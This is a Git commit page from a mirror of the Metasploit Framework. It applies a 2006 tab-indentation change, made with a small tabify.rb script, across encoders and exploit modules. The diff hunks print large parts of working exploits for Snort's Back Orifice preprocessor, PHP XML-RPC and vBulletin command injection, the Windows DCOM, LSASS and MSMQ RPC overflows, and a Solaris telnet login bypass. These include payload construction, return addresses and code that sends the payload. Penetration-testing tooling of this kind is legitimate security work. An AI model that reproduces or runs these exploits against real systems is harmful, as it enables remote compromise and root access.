infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Massive update to tab indentation (used ./dev/tabify.rb) 

git-svn-id: file:///home/svn/incoming/trunk@3450 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-01-27 05:00:35 +00:00
parent d62db8ad91
commit e249d9ebe5
25 changed files with 442 additions and 404 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
dev/tabify.rb Executable file
View File

@ -0,0 +1,25 @@
#!/usr/bin/env ruby
##
# Convert a ruby source file from space to tab indentation
# XXX - This program is dumb, it doesn't know about heredocs,
# multiline strings, or anything remotely fancy!
##
fd = STDIN
input = ARGV.shift
fd = File.open(input, "r") if input
tbuff = ''
etabs = 4
# Replace the leading spaces with equivalent tab characters
fd.each_line do |line|
line.sub!(/^\x20+/) do |m|
spaces = m.length
while (spaces % etabs != 0); spaces -= 1; end;
"\t" * (spaces / etabs)
end
tbuff << line
end
puts tbuff

2
modules/encoders/x86/alpha_mixed.rb
View File

@ -16,7 +16,7 @@ class AlphaMixed < Msf::Encoder::Alphanum
'Description' => %q{
Encodes payloads as alphanumeric mixedcase text. This encoder uses
SkyLined's Alpha2 encoding suite.
},
},
'Author' => [ 'pusscat', 'skylined' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,

4
modules/encoders/x86/alpha_upper.rb
View File

@ -16,7 +16,7 @@ class AlphaUpper < Msf::Encoder::Alphanum
'Description' => %q{
Encodes payloads as alphanumeric uppercase text. This encoder uses
SkyLined's Alpha2 encoding suite.
},
},
'Author' => [ 'pusscat' 'skylined' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
@ -34,7 +34,7 @@ class AlphaUpper < Msf::Encoder::Alphanum
def decoder_stub(state)
reg = datastore['BufferRegister'] || 'EAX'
offset = datastore['BufferOffset'].to_i || 0
Rex::Encoder::Alpha2::AlphaUpper::gen_decoder(reg, offset)
end

2
modules/encoders/x86/unicode_mixed.rb
View File

@ -16,7 +16,7 @@ class UnicodeMixed < Msf::Encoder::Alphanum
'Description' => %q{
Encodes payloads as unicode-safe mixedcase text. This encoder uses
SkyLined's Alpha2 encoding suite.
},
},
'Author' => [ 'pusscat', 'skylined' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,

2
modules/encoders/x86/unicode_upper.rb
View File

@ -16,7 +16,7 @@ class UnicodeUpper < Msf::Encoder::Alphanum
'Description' => %q{
Encodes payloas as unicode-safe uppercase text. This encoder uses
SkyLined's Alpha2 encoding suite.
},
},
'Author' => [ 'pusscat', 'skylined' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,

133
modules/exploits/linux/ids/snortbopre.rb
View File

@ -8,83 +8,90 @@ class Exploits::Linux::Ids::Snortbopre < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
'Description' => %q{
This module exploits a stack overflow in the Back Orifice pre-processor module
included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
be used to completely compromise a Snort sensor, and would typically gain an attacker
full root or administrative privileges.
},
'Author' => 'KaiJern Lau <xwings [at] mysec.org>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
],
'Payload' =>
{
'Space' => 1073, #ret : 1069
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Debian 3.1 Sarge
[
'Debian 3.1 Sarge',
{
'Platform' => 'linux',
'Ret' => 0xbffff350
}
],
],
'DefaultTarget' => 0))
'Name' => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
'Description' => %q{
This module exploits a stack overflow in the Back Orifice pre-processor module
included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
be used to completely compromise a Snort sensor, and would typically gain an attacker
full root or administrative privileges.
},
'Author' => 'KaiJern Lau <xwings [at] mysec.org>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
],
'Payload' =>
{
'Space' => 1073, #ret : 1069
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Debian 3.1 Sarge
[
'Debian 3.1 Sarge',
{
'Platform' => 'linux',
'Ret' => 0xbffff350
}
],
],
'DefaultTarget' => 0))
# Configure the default port to be 9080
register_options(
[
Opt::RPORT(9080),
], self.class)
# Configure the default port to be 9080
register_options(
[
Opt::RPORT(9080),
], self.class)
end
def msrand(seed)
@holdrand = 31337
end
def msrand(seed)
@holdrand = 31337
end
def mrand()
return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
end
def mrand()
return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
end
def bocrypt(takepayload)
def bocrypt(takepayload)
@arrpayload = (takepayload.split(//))
@arrpayload = (takepayload.split(//))
encpayload = ""
@holdrand=0
msrand(0)
encpayload = ""
@holdrand=0
msrand(0)
@arrpayload.each do |c|
encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
end
@arrpayload.each do |c|
encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
end
return encpayload
end
return encpayload
end
def exploit
connect_udp
boheader = "*!*QWTY?" +
[1096].pack("V") + # Length ,thanx Russell Sanford
"\xed\xac\xef\x0d"+ # ID
"\x01" # PING
filler = make_nops(1069 -(boheader.length + payload.encode.length))
def exploit
connect_udp
boheader =
"*!*QWTY?" +
[1096].pack("V") + # Length ,thanx Russell Sanford
"\xed\xac\xef\x0d"+ # ID
"\x01" # PING
filler =
make_nops(1069 -(boheader.length + payload.encode.length))
udp_sock.write(bocrypt(boheader+payload.encode+filler+[target.ret].pack('V')))
handler
disconnect_udp
end
udp_sock.write(
bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
)
handler
disconnect_udp
end
end

12
modules/exploits/osx/afp/loginext.rb
View File

@ -10,12 +10,12 @@ class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'AppleFileServer LoginExt PathName Overflow',
'Description' => %q{
This module exploits a stack overflow in the AppleFileServer service
on MacOS X. This vulnerability was originally reported by Atstake and
was actually one of the few useful advisories ever published by that
company. You only have one chance to exploit this bug.
This particular exploit uses a stack-based return address that will
only work under optimal conditions.
This module exploits a stack overflow in the AppleFileServer service
on MacOS X. This vulnerability was originally reported by Atstake and
was actually one of the few useful advisories ever published by that
company. You only have one chance to exploit this bug.
This particular exploit uses a stack-based return address that will
only work under optimal conditions.
},
'Author' => 'hdm',
'License' => MSF_LICENSE,

4
modules/exploits/solaris/sunrpc/solaris_kcms_readfile.rb
View File

@ -66,7 +66,7 @@ use Pex::XDR;
my $advanced = { };
my $info =
{
{
'Name' => 'Solaris KCMS Arbitary File Read',
'Version' => '$Revision$',
'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
@ -98,7 +98,7 @@ my $info =
'Keys' => ['kcms'],
'DisclosureDate' => 'Jan 22 2003',
};
};
sub new {
my $class = shift;

12
modules/exploits/solaris/sunrpc/solaris_sadmind_exec.rb
View File

@ -73,7 +73,7 @@ use Pex::XDR;
my $advanced = {};
my $info =
{
{
'Name' => 'Solaris sadmind Command Execution',
'Version' => '$Revision$',
'Authors' =>
@ -102,10 +102,10 @@ my $info =
},
'Description' => Pex::Text::Freeform(qq{
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
}),
'Refs' =>
@ -120,7 +120,7 @@ my $info =
'Keys' => ['sadmind'],
'DisclosureDate' => 'Sep 13 2003',
};
};
sub new {
my $class = shift;

4
modules/exploits/solaris/sunrpc/solaris_snmpxdmid.rb
View File

@ -72,7 +72,7 @@ use Pex::XDR;
my $advanced = { };
my $info =
{
{
'Name' => 'Solaris snmpXdmid AddComponent Overflow',
'Version' => '$Revision$',
'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
@ -114,7 +114,7 @@ my $info =
'Keys' => ['snmpxdmid'],
'DisclosureDate' => 'Mar 15 2001',
};
};
sub new {
my $class = shift;

6
modules/exploits/solaris/telnet/solaris_bin_login.rb
View File

@ -68,7 +68,7 @@ use Pex::Text;
my $advanced = { };
my $info =
{
{
'Name' => 'Solaris /bin/login TTYPROMPT Overflow',
'Version' => '$Revision$',
'Authors' =>
@ -94,7 +94,7 @@ my $info =
},
'Description' => Pex::Text::Freeform(qq{
This is a msf port of optyx's /bin/login exploit.
This is a msf port of optyx's /bin/login exploit.
}),
'Refs' =>
@ -110,7 +110,7 @@ my $info =
],
'Keys' => ['broken'],
};
};
sub new {
my $class = shift;

10
modules/exploits/solaris/telnet/ttyprompt.rb
View File

@ -34,7 +34,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
},
'PayloadCompat' =>
{
"PayloadType" => "cmd cmd_interact",
"PayloadType" => "cmd_interact",
},
'Targets' =>
[
@ -77,7 +77,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
print_status("Sending username with 65 environment variables...")
sock.put(datastore['USER'] + (" M" * 65) + "\n")
sock.put(payload.encoded)
sock.put("\n\n\n")
sleep(0.25)
sock.get_once
sock.put(payload.encoded + "\n")
sleep(0.25)
handler

108
modules/exploits/unix/http/php_vbulletin_template.rb
View File

@ -20,28 +20,28 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' => [
[ 'OSVDB', '14047'],
[ 'CVE', '2005-0511'],
[ 'MIL', '81'],
[ 'OSVDB', '14047'],
[ 'CVE', '2005-0511'],
[ 'MIL', '81'],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Platform' => ['unix', 'solaris'],
'Payload' => {
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 25 2005'
))
))
register_options(
[
OptString.new('PATH', [ true, "Path to misc.php", '/forum/misc.php']),
], self.class
)
register_options(
[
OptString.new('PATH', [ true, "Path to misc.php", '/forum/misc.php']),
], self.class
)
deregister_options(
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
@ -49,54 +49,54 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
end
def go(command)
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
command = "echo #{wrapper};#{command};echo #{wrapper};"
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
uri = datastore['PATH'] + "?do=page&template={${passthru(#{encoded})}}";
res = request({
'uri' => datastore['PATH'],
'method' => 'GET',
})
res = request({
'uri' => datastore['PATH'],
'method' => 'GET',
})
if (res and res.body)
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
if (res and res.body)
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
return nil
return nil
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
else
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
end
end

142
modules/exploits/unix/http/php_xmlrpc_eval.rb
View File

@ -10,39 +10,39 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'PHP XML-RPC Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
},
'Author' => [ 'hdm', 'cazz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['BID', '14088'],
['CVE', '2005-1921'],
['MIL', '49'],
['BID', '14088'],
['CVE', '2005-1921'],
['MIL', '49'],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Platform' => ['unix', 'solaris'],
'Payload' => {
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2005'
))
))
register_options(
[
OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
], self.class
)
register_options(
[
OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
], self.class
)
deregister_options(
'HTTP::junk_params', # not your typical POST, so don't inject params.
@ -52,64 +52,64 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
def go(command)
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
xml =
'<?xml version="1.0"?>' +
"<methodCall>" +
"<methodName>"+ Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
"<params><param>" +
"<name>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
"<value>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</value>" +
"</param></params>" +
"</methodCall>";
xml =
'<?xml version="1.0"?>' +
"<methodCall>" +
"<methodName>"+ Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
"<params><param>" +
"<name>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
"<value>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</value>" +
"</param></params>" +
"</methodCall>";
res = request({
'uri' => datastore['PATH'],
'method' => 'POST',
'Content-Type' => 'application/xml',
'data' => xml,
})
res = request({
'uri' => datastore['PATH'],
'method' => 'POST',
'Content-Type' => 'application/xml',
'data' => xml,
})
if (res and res.body)
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
if (res and res.body)
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
return nil
return nil
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
else
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
end
end

74
modules/exploits/windows/dcerpc/ms03_026_dcom.rb
View File

@ -113,17 +113,19 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
ntshiz = nt4sp3jmp +
[ target['Rets'][6] ].pack('V') +
[ target['Rets'][5] ].pack('V') +
nt4sp5jmpback +
nt4sp3jmpback
ntshiz =
nt4sp3jmp +
[ target['Rets'][6] ].pack('V') +
[ target['Rets'][5] ].pack('V') +
nt4sp5jmpback +
nt4sp3jmpback
# Pad to the magic value of 118 bytes
ntshiz += Rex::Text.rand_text(118 - ntshiz.length, payload_badchars)
# Create the evil UNC path used in the overflow
uncpath = "\x5c\x00\x5c\x00" +
uncpath =
"\x5c\x00\x5c\x00" +
("\x90" * 32) +
"\xeb\x10\xeb\x19" + # When attacking NT 4.0, jump over 2000/XP return
[ target['Rets'][2] ].pack('V') + # Return address for 2000 (ebx)
@ -142,41 +144,41 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
# This is the rpc cruft needed to trigger the vuln API
stubdata =
NDR.short(5) +
NDR.short(1) +
NDR.long(0) +
NDR.long(0) +
Rex::Text.rand_text(16) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.short(5) +
NDR.short(1) +
NDR.long(0) +
NDR.long(0) +
NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +
Rex::Text.rand_text(16) +
NDR.long(0) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +
NDR.long(1) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF))
NDR.long(0) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(1) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF))
print_status('sending exploit ...')
begin
dcerpc_call(0, stubdata)

39
modules/exploits/windows/dcerpc/ms05_017_msmq.rb
View File

@ -62,11 +62,11 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
def exploit
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# MSMQ supports three forms of queue names, the two we can use are
@ -97,20 +97,21 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
# Get the unicode length of this string
queue_plen = queue_path.length / 2
stubdata = NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(3) +
NDR.long(3) +
NDR.long(2) +
NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
stubdata =
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(3) +
NDR.long(3) +
NDR.long(2) +
NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
print_status('sending exploit ...')
response = dcerpc.call(0, stubdata)
print_status('sending exploit ...')
response = dcerpc.call(0, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
case dcerpc.last_response.stub_data
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
case dcerpc.last_response.stub_data
when "\x20\x00\x0e\xc0"
print_status("The server rejected our request, the HNAME parameter could be incorrect")
when "\x1e\x00\x0e\xc0"
@ -118,8 +119,8 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
else
print_status("An unknown response was received from the server:")
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
end
end
end
end
handler
disconnect

26
modules/exploits/windows/license/ca_client_getconfig.rb
View File

@ -83,7 +83,7 @@ use IO::Select;
my $advanced = { };
my $info =
{
{
'Name' => 'CA License Client GETCONFIG Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
@ -105,17 +105,17 @@ my $info =
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an vulnerability in the CA License Client
service. This exploit will only work if your IP address will
resolve to the target system. This can be accomplished on a local
network by running the 'nmbd' service that comes with Samba. If
you are running this exploit from Windows and do not filter udp
port 137, this should not be a problem (if the target is on the same
network segment). Due to the bugginess of the software, you are
only allowed one connection to the agent port before it starts
ignoring you. If it wasn't for this issue, it would be possible to
repeatedly exploit this bug.
This module exploits an vulnerability in the CA License Client
service. This exploit will only work if your IP address will
resolve to the target system. This can be accomplished on a local
network by running the 'nmbd' service that comes with Samba. If
you are running this exploit from Windows and do not filter udp
port 137, this should not be a problem (if the target is on the same
network segment). Due to the bugginess of the software, you are
only allowed one connection to the agent port before it starts
ignoring you. If it wasn't for this issue, it would be possible to
repeatedly exploit this bug.
}),
'Refs' =>
@ -143,7 +143,7 @@ my $info =
'Keys' => ['calicense'],
'DisclosureDate' => 'Mar 02 2005',
};
};
sub new {
my $class = shift;

10
modules/exploits/windows/license/ca_server_getconfig.rb
View File

@ -74,7 +74,7 @@ use Pex::Text;
my $advanced = { };
my $info =
{
{
'Name' => 'CA License Server GETCONFIG Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
@ -96,9 +96,9 @@ my $info =
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an vulnerability in the CA License Server
network service. This is a simple stack overflow and just one of
many serious problems with this software.
This module exploits an vulnerability in the CA License Server
network service. This is a simple stack overflow and just one of
many serious problems with this software.
}),
'Refs' =>
@ -126,7 +126,7 @@ my $info =
'Keys' => ['calicense'],
'DisclosureDate' => 'Mar 02 2005',
};
};
sub new {
my $class = shift;

8
modules/exploits/windows/proxy/bluecoat_winproxy_host.rb
View File

@ -18,7 +18,7 @@ class Exploits::Windows::Proxy::Bluecoat_WinProxy_Host < Msf::Exploit::Remote
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
'References' =>
[
['CVE', '2005-4085'],
],
@ -46,9 +46,9 @@ class Exploits::Windows::Proxy::Bluecoat_WinProxy_Host < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80)
], self)
[
Opt::RPORT(80)
], self)
end

64
modules/exploits/windows/smb/ms04_011_lsass.rb
View File

@ -40,13 +40,13 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
# Automatic
[
'Automatic Targetting',
{
'Platform' => 'win',
'Rets' => [ ],
},
],
@ -54,7 +54,6 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
[
'Windows 2000 English',
{
'Platform' => 'win',
'Rets' => [ 0x773242e0 ],
},
],
@ -62,7 +61,6 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
[
'Windows XP English',
{
'Platform' => 'win',
'Rets' => [ 0x7449bf1a ],
},
],
@ -72,17 +70,17 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
def exploit
connect()
connect()
handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
print_status('Getting OS ...')
print_status('Getting OS ...')
# Check the remote OS name and version
os = smb_peer_lm
string = ''
string = ''
case os
# Windows 2000 requires that the string be unicode formatted
# and give us a nice set of registers which point back to
@ -93,7 +91,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
str = Rex::Text.rand_text_alphanumeric(3500)
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
str[2104, payload.encoded.length ] = payload.encoded
string = NDR.UnicodeConformantVaryingString(str)
string = NDR.UnicodeConformantVaryingString(str)
# Windows XP is a bit different, we need to use an ascii
# buffer and a jmp esp. The esp register points to an
# eight byte segment at the end of our buffer in memory,
@ -105,34 +103,34 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
str[0, payload.encoded.length ] = payload.encoded
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
string = str
string = str
when
print_status("No target is available for #{ os }")
return
end
stub = string +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
Rex::Text.rand_text(528) +
Rex::Text.rand_text(528) +
NDR.long(rand(0xFFFFFF))
stub = string +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
Rex::Text.rand_text(528) +
Rex::Text.rand_text(528) +
NDR.long(rand(0xFFFFFF))
print_status('sending exploit ...')
begin
response = dcerpc_call(9, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('Server did not respond, but that should be ok ...')
end
print_status('sending exploit ...')
begin
response = dcerpc_call(9, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('Server did not respond, but that should be ok ...')
end
# Perform any required client-side payload handling
handler

79
modules/exploits/windows/smb/ms04_031_netdde.rb
View File

@ -4,7 +4,7 @@ module Msf
class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
include Exploit::Remote::SMB
include Exploit::Remote::SMB
include Exploit::Remote::DCERPC
def initialize(info = {})
@ -12,9 +12,9 @@ class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
'Name' => 'Microsoft Network Dynamic Data Exchange Server MS04-031',
'Description' => %q{
This module exploits a stack overflow in the NetDDE service, which is the
precursor tothe DCOM interface. This exploit effects only Pre-Windows XP
SP1 operating systems. Also, despite Microsoft's claim that this is PreAuth,
Auth seems to be required to reach the nddeapi entrypoint.
precursor tothe DCOM interface. This exploit effects only Pre-Windows XP
SP1 operating systems. Also, despite Microsoft's claim that this is PreAuth,
Auth seems to be required to reach the nddeapi entrypoint.
